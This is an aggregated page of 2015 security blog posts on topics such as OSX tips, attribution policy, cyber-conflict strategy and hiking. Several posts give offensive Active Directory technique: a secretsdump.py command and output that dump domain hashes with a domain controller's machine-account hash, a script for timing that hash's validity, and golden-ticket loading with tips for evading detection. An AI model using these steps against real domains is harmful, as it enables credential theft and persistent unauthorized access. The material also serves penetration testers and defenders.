NoVA Bloggers

Hiding desktop icons for presentations on OSX

Rob Fuller — Thu, 01 Oct 2015 10:47:00 +0000

If you found this post via a search, you are probably like me, "not great" at keeping your desktop clear "stuff" (you probably have a 'stuff' folder you once put stuff in and forgot about).

If you are, and you go into a presentation, you probably don't want to have all of your icons visible (and possibly recorded). Hiding your desktop icons on Windows (since 7 I believe) is pretty simple.

src: http://www.thewindowsclub.com/desktop-icons-not-showing-windows-7

On OSX, its not as straight forward. Following a tip I found here: http://hints.macworld.com/article.php?story=20100804092806364 I was able to create a keyboard shortcut to hide, or unshide everything.

First, open up "Automator" and create a new document / "Service"

Then drag and drop "Run AppleScript" from the Utilities section:

Next, make sure it says that the service doesn't accept input from any application:

Paste in the following script:

on run {input, parameters}

set myAnswer to (do shell script "defaults read com.apple.finder CreateDesktop") as boolean

do shell script "defaults write com.apple.finder CreateDesktop " & ((not myAnswer) as string)

do shell script "killall Finder"

end run

On the first run, you may get an error stating that the variable doesn't exist or that it couldn't convert it into a boolen. This is because by default this variable doesn't exist for new users. All you have to do to correct this is open a terminal and type:

defaults write com.apple.finder CreateDesktop true

To set it for the first time:

Back in Automator, re-do the test run of the script:

Save the file and then you can setup up a keyboard shortcut in System Preferences:

Hit Control+Cmd+H to your hearts content.

Attribution: OPM vs Sony

Richard Bejtlich — Tue, 29 Sep 2015 19:56:00 +0000

I read Top U.S. spy skeptical about U.S.-China cyber agreement based on today's Senate Armed Services Committee hearing titled United States Cybersecurity Policy and Threats. It contained this statement:

U.S. officials have linked the OPM breach to China, but have not said whether they believe its government was responsible.

[Director of National Intelligence] Clapper said no definite statement had been made about the origin of the OPM hack since officials were not fully confident about the three types of evidence that were needed to link an attack to a given country: the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and who was responsible for directing the act.

I thought this was interesting for several reasons. First, does DNI Clapper mean that the US government has not made an official statement regarding attribution for China and OPM because all "three types of evidence" are missing, or do we have one, or perhaps two? If that is the case, which elements do we have, and not have?

Second, how specific is the "actual perpetrator doing the keystrokes"? Did DNI Clapper mean he requires the Intelligence Community to identify a named person, such that the IC knows the responsible team?

Third, and perhaps most importantly, contrast the OPM case with the DPRK hack against Sony Pictures Entertainment. Assuming that DNI Clapper and the IC applied these "three types of evidence" for SPE, that means the attribution included the geographic point of origin, the identity of the "actual perpetrator doing the keystrokes," and the identity of the party directing the attack, which was the DPRK. The DNI mentioned "broad consensus across the IC regarding attribution," which enabled the administration to apply sanctions in response.

For those wondering if the DNI is signalling a degradation in attribution capabilities, I direct you to his statement, which says in the attribution section:

Although cyber operations can infiltrate or disrupt targeted ICT networks, most can no longer assume their activities will remain undetected indefinitely. Nor can they assume that if detected, they will be able to conceal their identities. Governmental and private sector security professionals have made significant advances in detecting and attributing cyber intrusions.

I was pleased to see the DNI refer to the revolution in private sector and security intelligence capabilities.

Domain Controller Machine$ Account To Dump Hashes Notes

noreply@blogger.com (CG) — Fri, 25 Sep 2015 13:00:00 +0000

In case you missed it, Mubix posted this post a few days ago:

http://www.room362.com/2015/09/using-domain-controller-account.html

The great part of the post in case you didn't see/understand is that you can dump hashes from the domain controller using the Domain Controller machine account (example: CORP-MYDC$). So finally a use for all those machine accounts you normally just cut out from pwdumps :-)

Whats also important about this from the defensive perspective is you can roll the krbtgt password but if an attacker still has the ability to talk any domain controller (and at some point dumped the full domain hashes) they can attempt to re-pull the hashes or most importantly the new krbtgt hash to create new golden tickets.

I'm going to steal Rob's impacket secretsdump output here in case it disappears in the future.

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Note: this is a 1-to-1 functionality, meaning DC2k8_1 hash needs to authenticate against DC2k8_1 IP address. If you do this against DC2k8_2 obviously it will fail.

Not sure on how to address this honestly. More frequent machine password changes for domain controllers may be in order and initial reading says you can use netdom.exe to make the change as well. More info here:
http://blogs.technet.com/b/askds/archive/2009/02/15/test2.aspx
http://windowsitpro.com/active-directory/reset-computer-active-directory-password-command-line
https://support.microsoft.com/en-us/kb/325850 < --netdom.exe info

If anyone has resources/suggestions on managing this please post up.

Hacking Advice for @krystropolis

Rob Fuller — Thu, 24 Sep 2015 12:41:00 +0000

Today I was asked by @Krystropolis for a "Hello" and maybe some hacking advice, see tweet:

I thought about it on my entire 1 hour drive home from just turning in my badge and laptop from a big corporation to go work at a start up. I thought about talking about ethics and data handling, to Geo-politics. I mean, what kind of hacking are we talking about.

I finally ended up thinking about what would have been the best advice for me, growing up, for "how to learn hacking", and I boiled it down right before I pulled into my drive way to two words: "Build It". For me personally, I didn't start to really understand attackers, attacks, or even simple defense strategies until I started to try to build it myself.

For many hackers (and mechanics, my father included) they started by taking things a part first, then putting them back together (usually with a few extra screws or parts that "didn't matter" on the side). But for me, I learned best, by building from scratch. This went from stealing RAM for the "old junk" computer locker from my high school to upgrade my Mom's 95 Mhz Pentium (OH YA!) - in my defense, the computer science teacher told me that I could take anything I needed to build a computer and he didn't specify the physical location that computer had to be in - all the way to working on the sensor grid for the Marine Corps networks when I helped at the MARCERT as a level 1 tech. I even convinced a few of the Hak5 crew at the time to let me build Gentoo (Stage 3 baby!) on their laptops because it was tons faster (once everything compiled 10 years later).

Man do I ramble. Point is. If you want to learn hacking, or how to hack, you need to know a system inside and out first. System (noun) in it's most basic sense. The best penetration testers / hackers I have ever known are the ones that have rebuilt their labs/phone/widget for the 500th time.

UPDATE: I have had a few comments, about the post already. But what I forgot to point out is that by building a system or network you not only get to know the ins and outs of how it works, and what shortcuts you had to take to get it to actually work, but also the appreciation of what it took for you to build it, the hours/research that went into it, how it connects to other systems and clients, and finally what kind of business impact it could or does have on actual corporations. These are core skills to be an effective communicator of risk and need, while keeping compassion for the requirements and business impact. Highly sought after skills in the job market.

I hope this helps.
Rob

Sieges II: The most important cybersecurity conflict classification

Wed, 23 Sep 2015 16:55:23 +0000

A couple of people have asked me to clarify what I mean by Sieges (and parasites) in terms of the first Siege post and the subsequent strategy/problem space framework post. Here’s a quick email I wrote that might help:

Sieges and Parasites:

From a collective non-aggressor entity perspective, cybersecurity “conflict” is functionally a siege of the collective environment: Non-combatants trying to maintain a minimum level of survivability while they’re surrounded, being drained of resources, and lack sufficient environmental influence/position to make effective risk decisions.

Compare/Contrast Siege and Parasitic Environment as conflict types to: crime, espionage, battlefield warfare, natural events. These latter tend to be incident/event driven, where the risk and responses to a siege are more environmental over time, with incidents to individuals happening but being largely irrelevant except as they contribute to the overall lack of stability/freedom to operate.

This though process got kicked off for me while reading about the siege of Sarajevo in particular. Imagine – you (a private org standing in as a citizen for this narrative) are in a city surrounded by artillery and snipers and you have to decide how best to keep getting water, which involves cross several streets through town. Some streets are vaguely safer than others, usually, but not necessarily. You occasionally can see or have insight into the people on the hills, but not usually. There are dedicated defenders around, but theyre not well positioned and lack the capacity to defend everyone all the time. Your resources are limited and your freedom to operate is constrained further over time as resources diminish. You can be hit at any time once you move from a standstill from your base/home (and even then, without change, you are at some risk). You sort of make up criteria for decisions that help you feel safer (has anyone crossed that street recently? Were they shot at?) but aren’t really indicative of actual risk.

In this case, trying to decide how and when to get water as a risk based decision is almost a nonsensical proposition: You don’t control your environment, you have a lot of exposure, and you lack relevant information that would change your situation significantly (this isn’t the same as lacking data, just helpful data).

This scenario is substantially different from how we look at cybersecurity and infosec today: Individual defenders, with sufficient skill and competency, access to resources indefinitely and as needed, on a relatively level playing field, trying to prevent, manage, or mitigate individual events on their own.

Ultimately, right now, we’re asking a bunch of non-combatants (you know, most businesses) to have the capacity to effectively and sustainable participate in what is becoming a low level global conflict (inclusive of state to state, criminal, hacktivist, etc activity) while under siege.

This is a broken model and will never, ever get us where we want to be (for more reasons than I’ll lay out here). We have to break the siege (thoughts on that being out of scope for the moment), which involves a level of strategic cooperation and unity that present culture, politics, business realities, and law do not allow.

(The Parasitic environment analogy is more specific to single-organizations, as it allows for specific targeting: https://sintixerr.files.wordpress.com/2015/01/hackervaluechain2.jpg )

Aside: Interestingly, though, from an aggressor standpoint, it might or *might not* look like either a siege or a parasitic environment – ie, aggressors acting individually and *without* coordination are contributing to creating a separate conflict type for defenders (Siege).

Filed under: Critical Infrastructure Protection, Cybersecurity General, Risk Management Theory Tagged: "conflict type", cyberspace, parasites, siege, sieges

Ways To Load Kerberos Tickets

noreply@blogger.com (CG) — Wed, 23 Sep 2015 13:00:00 +0000

Everyone is aware of the awesomeness that Mimikatz is and most likely golden tickets. Mimikatz ships with lots of kerberos functionality.

Just wanted to jot down some quick notes on using these tickets.

1. See the links in the resources section to generate a golden ticket. Chris Truncer's post is more than clear on how to do it, so I wont reproduce the content. What's more interesting (to me) is that you can generate these tickets offline on a host that is not connected to the network you are working on. This is perhaps handy if you have a bunch of host instrumentation on the network you are attacking and don't want to risk uploading and running Mimikatz on the host.

2. With this .kirbi ticket created you now need to load it into your session. You have a few options:

Mimikatz via Pass The Ticket (ptt) functionality You can load it via the kiwi module in meterpreter -- stealing Chris' image here:

Via WCE kerberos functionality

-K Dump Kerberos tickets to file (unix & 'windows wce' format)
-k Read Kerberos tickets from file and insert into Windows cache

What's important to note here is that WCE will NOT load a Mimikatz generated ticket (didn't try ccache format). What you CAN do is load the ticket via mimikatz on your offline host then export with with WCE, then upload WCE and the WCE ticket (wce_krbtkts) to the host and load it into the cache there.

You can export the kirbi ticket with kirbikator (this will make it ccache ticket) and use smbclient or impacket (preferred) to use the ticket on linux/osx reference: https://twitter.com/gentilkiwi/status/561901226682744832

3. Depending on the type of alerting when you make a ticket it uses the 500 account by default. Assuming you aren't spoofing that particular account you might get the added bonus of having your actions attributed to another account.

Additional Gotchas

CT's post uses a fake user. If you do this, according to @gentilkiwi you have to use the ticket within 20 minutes of creation. Mimikatz does let you create a ticket in the future with the /startoffset option
Impacket currently (5 SEP 15 --this post will be published later) will NOT work with a fake or inactive user where windows will let it slide. So if you make a golden ticket you need it to be with an active user. I suspect beto will fix this soon.
There is a lot of guidance around detecting this attack by using looking for tickets with a 10 year lifespan (this is the Mimikatz default). You can avoid this using the /endin option with Mimikatz. More here from MS: https://www.microsoftvirtualacademy.com/en-us/training-courses/how-to-avoid-golden-ticket-attacks-12134?l=4NoyuNYUB_604300474

Resources:
https://www.christophertruncer.com/golden-tickets-and-external-sids-compromise-the-child-and-win/
https://www.christophertruncer.com/golden-ticket-generation/
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
http://cert.europa.eu/static/WhitePapers/CERT-EU-SWP_14_07_PassTheGolden_Ticket_v1_1.pdf

A Strategic Cybersecurity Problem Space Framework

Tue, 22 Sep 2015 17:45:01 +0000

I’ve been known, now and again, to mouth off sarcastically that we don’t have any idea what “Cybersecurity” is, strategically – that we have no real concept of what “it” is. So, as a preface to my upcoming talks, I’ve sketched out a very, very draft and incomplete framework off the top of my head that is, I think, STILL more complete than anything else out there. It’s done in terms of “Environments” that must be managed or that pose describable, discernible, solvable problem spaces that pertain to cybersecurity risk. Note how different this looks than the NIST Framework, NERC CIP, SANS guidance, what you hear panels talk about, etc. Just remember, I have a lot to add here, which I’ll do after my upcoming talks have been given.

A STRATEGIC CYBERSECURITY PROBLEM SPACE FRAMEWORK

Conflict Environment

Sieges & Unity (Defense problem of community siege-breaking, not incidents)
1. Game Theory & International Relations
2. Norms, Stabilization, and Confidence Building Measures
Parasite Management
1. Single Organization Value Control
2. Competition for use of shared, not owned infrastructure
Information vs Kinetic Warfare
1. Long term abuse of misplaced cultural, political, and legal redlines

Technical Environment

Complexity (exposure rising directly and infinitely with complexity)
Competency (technical competency required by all, who cannot maintain)
Security Express-ability (lower layers are approximating upper layer expressions)

Physical Environment

Geography & Power Delegation (Targets are Geography, cannot insert gov between industry and adversary)
Geography & Proximity (Everyone is a Neighbor)

Single Organizational Environment

Developing Sustainable Practices without requiring core Competency
Decision Making Capacity Building
Full System (Human) Threat Modeling
1. Self Awareness
2. Vulnerability/Exposure Identification & Management
3. Exploitation Opportunity Identification & Management

Human Environment

Stakeholder psychology requires targeted action to achieve desired behavior change
Exceptional Distance between decisions, actions and risk limits involvement
Ability to Process sufficient incoming knowledge tangential to core

National Environment

Common Problem Space Consensus Development/Socialization
Development and Engagement of Appropriate Regimes
Stabilizing vs Developing managed Environments
Business Value Production is inherently and completely tied to exposure creation/mgt, how does gov manage?

Market Environment

Entrenched Industry is sucking needed resources away uselessly, needs derailment (fail, iterate, improve)
Abstract, tenuous connection between market and risk

Leadership Environment

We Need Generals: Now Guys with Guns Espousing Tactical Requirements in Place of Strategies to Win (Win = Desired level of risk for desired investment over time)
Formal Roles limiting Routing of Knowledge/Capability into available levers (ie, if you’re not selling something, you’re not participating)

Filed under: Critical Infrastructure Protection, Cybersecurity General, Risk Management Theory Tagged: "cyber security" "Information security" strategy "Strategic framework" definition approach

Must Read: The Lafayette Campaign

Ben Tomhave — Sat, 19 Sep 2015 04:20:58 +0000

Given the ongoing primary races for the two "major" parties, the timing of Andy Updegrove's The Lafayette Campaign couldn't be much better. It's a sequel to his most excellent first Adversego thriller, the Alexandria Project.

In The Lafayette Campaign, our intrepid computer security hero Frank Adversego is asked by a super-secret intelligence agency to investigate electronic voting fraud. The farther down the rabbit hole he goes, the crazier things get. The cast of characters seems straight out of the GOP slate. The story will leave you wondering if, as voters, we really do have an actual choice.

By the end you'll be eager for Updegrove's next story in the series. I highly recommend getting your copy now!

Get PasswordLastSet time for Domain Controller accounts

Rob Fuller — Wed, 16 Sep 2015 11:24:00 +0000

AKA - ROB WRITES POWERSHELL!!

Yesterday I posted a way to dump hashes using a Domain Controller account. But how do you know which account to use? And when was it's password last set? net user unfortunately won't do computer accounts.

So I decided to write a PowerShell script to find out. Unfortunately Windows 7 doesn't come with the ActiveDirectory PowerShell module (I'm sure there is another way to do this but here is how I did it.

Installed the Remote Server Administration Tools - http://blogs.msdn.com/b/rkramesh/archive/2012/01/17/how-to-add-active-directory-module-in-powershell-in-windows-7.aspx (Not stealthy)

Then I was able to use the follow janky script I wrote to find all of the PasswordLastSet values for all of the Domain Controllers

Import-Module ActiveDirectory

$dclist = Get-ADDomainController -Filter { isGlobalCatalog -eq $true } | Select-Object Name

Foreach ($dc in $dclist)
{
$lastset = Get-ADComputer $dc.Name -property PasswordLastSet
Write-Host "$($dc.Name) - $($lastset.PasswordLastSet)"
}

This would probably be an awesome recon / situational awareness module for Empire ( https://github.com/PowerShellEmpire/Empire ) but written better hopefully.

Output is pretty simple, it looks like this:

DC1 - 09/15/2015 07:05:40

Now I know that I have about 29 days left of valid use of that hash.

Using Domain Controller Account Passwords to HashDump Domains

Rob Fuller — Tue, 15 Sep 2015 17:48:00 +0000

Since I follow both +Carlos Perez and +Benjamin Delpy on Twitter, something caught my eye on August 2nd, soon after +Benjamin Delpy drops DCSync:

https://twitter.com/gentilkiwi/status/627980725074153473

And then later on August 28th, again about the DC$ account (Domain Controller computer account):

https://twitter.com/gentilkiwi/status/637402457740562432

Because DCSync is calling on "sync" based APIs of Active Directory, that are, by default, used only by Domain Controllers, all Domain Controller computer accounts would have the ability to do this as well as the Domain/Enterprise Admins.

Anyone who's ever administered an Active Directory, knows that computer accounts change their passwords automatically. How often do they change them?

https://support.microsoft.com/en-us/kb/154501

Machine account passwords are regularly changed for security purposes. By default, on Windows NT-based computers, the machine account password automatically changes every seven days. Starting with Windows 2000-based computers, the machine account password automatically changes every
30 days.

PSSSST!! That article is about how to DISABLE automatic password changing

Alright. So, I'm not going to go into "how" to get the hashes for a computer account, but if you've ever dumped passwords before, the computer accounts are the ones with the "$" on the end. Find the ones that are domain controllers, match up the hashes, and use Impacket's secretsdump.py to your heart's content. (Or until the password changes for that DC, then you use another one to dump it again, oh, did I not mention that computers don't change their passwords all at the same time in that 30 day window?)

Remember, Domain Controller's don't have a lot of other permissions, so you need to use the "-just-dc" option in SecretsDump in order for it to just do the domain dump:

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 -just-dc LAB/DC2k8_1\$@172.16.102.15

Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Happy #HackersDay

2015 DerbyCon Hiring

Rob Fuller — Mon, 14 Sep 2015 11:29:00 +0000

It’s often tough from both hiring and job hunters to find one another at conferences. I think this is mostly because of a couple things.

No one wants to stand at a both on either side and talk job stuff in front of a bunch of people and people at booths rarely get the chance to get away.
It’s hard to know “who” to talk to.

So I created a very simple Google doc to help put twitter handles and links together for people who are job hunting and people who are hiring to kinda get to know who to talk to.

Got more to add? Please let me know and I’ll get it added, or simply make a comment on the Google doc with the info to add

For reference on how this works, see the 2015 ShmooCon list

Link to the google doc: https://docs.google.com/spreadsheets/d/16TyaalxEilYN_QKIP3GxBMyQ2Kw8YYIj9_j-rgzLiFc

Good Morning Karen. Cool or Scary?

Richard Bejtlich — Sun, 13 Sep 2015 11:16:00 +0000

Last month I spoke at a telecommunications industry event. The briefer before me showed a video by the Hypervoice Consortium, titled Introducing Human Technology: Communications 2025. It consists of a voiceover by a 2025-era Siri-like assistant, speaking to her owner, "Karen." The assistant describes what's happening with Karen's household. 15 seconds into the video, the assistant says:

The report is due today. I've cleared your schedule so you can focus. Any attempt to override me will be politely rebuffed.

I was already feeling uncomfortable with the scenario, but that is the point at which I really started to squirm. I'll leave it to you to watch the rest of the video and report how you feel about it.

My general conclusion was that I'm wary of putting so much trust in a platform that is likely to be targeted by intruders, such that they can manipulate so many aspects of a person's life. What do you think?

By the way, the briefer before me noted that every vision of the future appears to involve solving the "low on milk problem."

Tres Lessons from Pied Piper Delete Key Hack

Rob Fuller — Thu, 10 Sep 2015 22:15:00 +0000

The teflon crew at Pied Piper suffered quite a bit during Season 2 of SILICON VALLEY. But there was no greater indignity than being brought to their knees by a tequila bottle.

Since episode eight “White Hat/Black Hat” aired, many skeptical viewers have asked: how could something like this happen?

Could a mindless error of pressing a delete key really cause a venerable company like Intersite to lose over nine thousand hours of content (including an irreplaceable archive of vintage yiffing videos)?

The short answer: yes.

When the producers of SILICON VALLEY reached out to me during the writing of the episode to help design the sequence, I knew it would be tough to make the technical intricacies track for the joke. But if the team had figured out optimal tip-to-tip of efficiency with Stanford PhDs, I was up for the challenge.

The delete key hack is a perfect storm of bad system hygiene. The dozens of small errors that led to it are more common than most systems administrators care to admit.

There’s a lesson here. Away from the big headlines about hacks at Sony Pictures and Target, companies every day have their systems broken by stupid errors. Most as avoidable as not putting a tequila bottle on a laptop (or letting Russ Hanneman inside your home in the first place).

Below is the the post-mortem on how the hack went down and tres lessons we can learn from it.

The Bake-Off

Intersite set up the bake-off between Endframe and Pied Piper by providing access to an FTP server with the target files. Each company then downloads the individual files, encodes, compresses and roundtrips the file back to the Intersite server.

To speed up the process of the compression, the companies sequentially encode each file to save hard drive space and time waiting for them all to copy down, then they perform the operation.

This is where all the problems originate: to deliver the compressed file, Pied Piper was given full permission to Intersite’s FTP server (because of course it’s easier to just give all permissions than manage every folder’s permissions).

For those interested, the final Pied Piper solution for Intersite would look something like this:

The Hack

When Russ sets down the Tres Comas tequila bottle on Richard’s laptop he unwittingly initiates a massive delete sequence on Intersite’s server. Here are the steps:

Richard navigates to bake-off directory or with the extended permissions he got into a parent folder with original content.
Gilfoyle turns off the delete verification prompts in the custom software they used for the file transfer and conversion. Richard meanwhile has enabled CRC checking on the internet system, a protection measure for penetration into Pied Piper that backfires.
Russ Hanneman arrives with the Tres Comas Tequila and mistakenly sets the bottle down on the keyboard initiating a delete command. Chaos ensues.
As the delete sequence launches the large file size of video spins the disks at 100% and locks the system.
Hands-on access with the bottle with the persistent delete requests plus the CRC checking creates fork bomb-like effects where the Pied Piper team cannot get back into the system to stop the delete sequence. Intersite is compromised and thousands of hours of video are deleted.

Tres Issues

A myriad of problems contributed to the delete key hack. Using the OWASP framework here are the top tres issues:

A7 - Missing Function Level Access Control “PITA Administration”

Intersite’s FTP server is set up to allow the bake-off users full permissions to the digital masters being used in the bake-off.

But why were they unable to kill the transfer? There are a bunch of reasons this could happen -- the SAN of which they were FTP’ed into was doing massive amounts of data deletion which can be HDD intensive (try deleting over 9000 files and watch your computer crawl).

But they would still be able to kill it on the Pied Piper end?! Not if the transfer agent was queuing up deletes as fast as it could, pegging out the server on the Pied Piper end as well. Remember, everything they had in their garage data center was going into making the conversions go as fast as possible, the transfer back was a lower priority.

A4 - Insecure Direct Object Reference “speed is everything”

By not locking out his screen and letting Russ Hanneman near his unsecured session where he was monitoring the transfer from, Richard allowed direct access to the “delete” key object.

But why didn’t it prompt for approving the delete?Basically when you’re in a bake-off like this, you do absolutely everything to remove any possible obstacles, like ANY prompts or approvals that you might not be around to hit “OK” on.

A6 - Sensitive Data Exposure “We must run forward simply to stay in place”

Intersite did not do a proper backup of their files due to cost and size constraints on their current system. In Episode 7 “Adult Content,” Molly Kendall, Intersite’s CEO, talked about how the porn industry was barely making the bills due to “free” internet porn influx. Intersite was doing its best to stay afloat in its industry and, as such, cut corners not only in the lack of proper admin for their FTP server, but also in storage costs. A mistake they will probably not make again soon.

Tres Lessons

Don’t be an idiot with permissions:

The easiest way in is through the front door. Ensure that everyone is on a need-to-know basis with data. Standard protections like 2-factor authentication and whitelisting IP addresses mean nothing if the wrong people access sensitive information.

Back up your data:

It’s easy to take for granted but reliable storage is still expensive. Most small businesses don’t backup data on a daily basis. Even fewer do so with any form of redundancy or integrity checks.

Don’t work with assholes:

Insider attacks are the hardest to detect and protect against. Surveys estimate 59% go unnoticed until it is too late. The first line of defense is common sense, only hire people you trust — and definitely not anyone who put radio on the Internet.

Where Am I? Upcoming Classes, Talks, Presentations

Thu, 10 Sep 2015 19:31:38 +0000

Getting to be a busy fall/winter schedule. If you’re interested in catching up with me, learning, or just discussing security, check me out at one of these venues:

Sept 14 | Washington DC | EnergySec Summit
- Giving workshop on Frameworks and the Discipline of Cybersecurity

Sept 28-29 | Krakow, Poland | CYBERSEC EU
- Panelist in the State Stream

Oct 8-9 | Detroit, MI | SIRAcon
- Speaking on risk: Yours, Anecdotally”

Oct 13-14 | Dallas, TX | “Reframing Cybersecurity”
- Teaching my 2-day class

Nov 7 | Jackson, MS | B-Sides Jackson
- Keynoting!

Nov 10-11 | Nashville, TN | “Reframing Cybersecurity”
- Teaching my 2-day class

Jan | Florida
- To Be Announced

Cant make these? Interested in having my somewhat unusual viewpoints represented at your security, industry, coffee, hiking, or other event? Let me know so I can get it on the calendar! :)

Filed under: Critical Infrastructure Protection, Cybersecurity General, Personal, Risk Management Theory Tagged: classes, conferences, Jack Whitsitt, speaking engagements, travel

Sieges

Tue, 08 Sep 2015 07:39:38 +0000

Pulled from a posting I made to SCADASEC:

—

Hard to believe that only 54 percent of those surveyed knew who to call in the event of a cyber incident or attack.

Why is this hard to believe? I think it’s not only hard to believe but
also somewhat astounding that we live in a world where we legitimately
expect a substantial percentage of our control systems operators to
have to know this information. Think about it. We’re not asking them
to be prepared for a hurricane, we’re asking them – businesses – to
have the knowledge and capability to participate (even if, in some
cases, minimally) in what is becoming global conflict (the delineation
between crime, war, espionage, vandalism, etc is really immaterial to
that statement). This isn’t a series of potential incidents, it’s an
effective siege environment. Sieges drain resources, drain morale,
and need a serious strategy to break, or those inside get overwhelmed
eventually. Even with or without actual (public) incidents, the effect
is the same here.

Fifty-three percent of respondents have experienced at least one malicious cyber attack on their control system networks and/or cyber assets— ** that they were aware of- ** within the past 24 months“. – WOW!

I can’t emphasize enough how…irrelevant….”incident” and “attack”
incidences are when taken individually, or even as concepts that can
be individualized and counted. The long term damage will be in
environmental predictability, resource allocation, trust, and
increasing cost of doing business. Maybe something really bad might
happen as an event, but whether it does or not, the foundational
environment can’t sustain this level of conflict and risk indefinitely
without cascading consequences.

Instead of concentrating on managing incidents, responding to
incidents, etc, we should be taking a serious look at what
environmental (technical, legal, social, political) changes we can
make to break the overall siege. Anything focused on incident
management directly is a two edged sword: It keeps us feeling like
we’re treading water at the cost of resources dedicated to fixing the
long term problems (and incident management capability for individual
organizations is *not* solving a long term problem).

All In My Late Night Humble Opinion. Take it as you will.

Filed under: Critical Infrastructure Protection, Cybersecurity General, Incident Response Tagged: conflict, cyberwar, siege

Back to Blogger

Rob Fuller — Mon, 07 Sep 2015 19:35:00 +0000

I've had my fare share of "trying new things" after SquareSpace . I tried Ghost, Octopress, Wordpress, and about 30 others in between. All the blogging platforms I tried had some major issues that I didn't like. I'm sure at some point I'll write about them but this post is mostly just to announce I _finally_ have given up the fight for finding the perfect blogging platform and I'm just going to blog on Blogger from now on. One of the main reasons for just giving in was the fact that I noticed that because I was doing conversion of 500+ blog posts every time I wanted to switch platforms I was constantly "not in the mood" to blog, which kinda negates the whole purpose of finding a new platform. Anywho, rant over. I should be back on the clock now, hopefully bringing cool stuff here in the weeks and months to come.

Are Self-Driving Cars Fatally Flawed?

Richard Bejtlich — Mon, 07 Sep 2015 08:53:00 +0000

I read the following in the Guardian story Hackers can trick self-driving cars into taking evasive action.

Hackers can easily trick self-driving cars into thinking that another car, a wall or a person is in front of them, potentially paralysing it or forcing it to take evasive action.

Automated cars use laser ranging systems, known as lidar, to image the world around them and allow their computer systems to identify and track objects. But a tool similar to a laser pointer and costing less than $60 can be used to confuse lidar...

The following appeared in the IEEE Spectrum story Researcher Hacks Self-driving Car Sensors.

Using such a system, attackers could trick a self-driving car into thinking something is directly ahead of it, thus forcing it to slow down. Or they could overwhelm it with so many spurious signals that the car would not move at all for fear of hitting phantom obstacles...

Petit acknowledges that his attacks are currently limited to one specific unit but says, “The point of my work is not to say that IBEO has a poor product. I don’t think any of the lidar manufacturers have thought about this or tried this.”

I had the following reactions to these stories.

First, it's entirely possible that self-driving car manufacturers know about this attack model. They might have decided that it's worth producing cars despite the technical vulnerability. For example, there is no defense in WiFi for jamming the RF spectrum. There are also non-RF jamming methods to disrupt WiFi, as detailed here. Nevertheless, WiFi is everywhere, but lives usually don't depend on it.

Second, researcher Jonathan Petit appears to have tested an IBEO Lux lidar unit and not a real self-driving car. We don't know, from the Guardian or IEEE Spectrum articles at least, how a Google self-driving car would handle this attack. Perhaps the vendors have already compensated for it.

Third, these articles may undermine one of the presumed benefits of self-driving cars: that they are supposed to be safer than human drivers. If self-driving car technology is vulnerable to an attack not found in driver-controlled cars, that is a problem.

Fourth, does this attack mean that driver-controlled cars with similar technology are also vulnerable, or will be? Are there corresponding attacks for systems that detect obstacles on the road and trigger the brakes before the driver can physically respond?

Last, these articles demonstrate the differences between safety and security. Safety, in general, is a discipline designed to improve the well-being of people facing natural, environmental, mindless threats. Security, in contrast, is designed to counter intelligent, adaptive adversaries. I am predisposed to believe that self-driving car manufacturers have focused on the safety aspects of their products far more than the security aspects. It's time to address that imbalance.

DevOps Days DC 2015 Talk Video

noreply@blogger.com (CG) — Sat, 05 Sep 2015 14:16:00 +0000

Here is good copy of Ken and I's DevOps Days DC talk:
"DevOops & How I hacked you"

DevOpsDays DC 2015 - 30 - DevOops & How I hacked you - Chris Gates, Facebook & Ken Johnson, nVisium from info@devopsdays.org on Vimeo.

Almost 600 Miles of Hiking in 365 Days.

Tue, 25 Aug 2015 23:08:18 +0000

I’ve mentioned here and there that I hit around 586 miles of hiking from August 6 2014 – August 6 2015. Last year was the first time I ever hiked more than 6 miles. Ever.

300 miles were in Appalachian Trail Sections and most of the other 286 were in the Pacific Northwest (and most of those were done in the Olympic Mountains).

Im writing about the whole experience, slowly (using tons of emails during the AT hikes as the core), but I thought folks would appreciate having an idea of where I’ve been in summary form. If nothing else, putting this here helps keep the history and experiences straight in my head.

The first section of this post is a hike location/distance summary and the second section is an alphabetized list of the trails I’ve been on – including links to any pictures I have, any official information online, and brief trip notes on my part.

I also wrote up a Medium piece HERE on a recent hike and it sort of sums up how I feel about being out here in general – and has some gorgeous pictures of what is, essentially, my backyard :)

Enjoy.

Distance Summary

MILES	HIKE	STATE
300	Appalachian Trail	NA
32	Enchanted Valley 1	WA
26	Enchanted Valley 2	WA
21	7 Lake Basin/High Divide	WA
20.4	Thunder Creek	WA
19.4	Hoh River Trail	WA
15	Shi Shi Beach 1	WA
14	Upper Lena Lake	WA
11.5	Marmot Pass	WA
9	Surprise Lake	WA
8.2	Dickerman	WA
8.2	Ollalie/Talapus Lakes	WA
8	Shi Shi Beach 2	WA
8	Yellowstone	WY
7.5	Blanca Lake	WA
7.4	Beckler Peak	WA
7.2	Snow Lake 1	WA
7.2	Snow Lake 2	WA
6.4	Looking Glass Rock	NC
6	Huntoon Point Snowshoe	WA
6	Oyster Dome	WA
6	South Lost Lake	WA
5.4	Mt Plchuck (all)	WA
5	Calypso Trail	MT
4.6	Heather Lake	WA
4	Mt Pilchuck (half)	WA
4	Tiger Mountain #3	WA
4	Trillium Lake Snowshoe	OR
3	Art Loeb Trail	NC
2.4	Cresent Beach Trail	OR

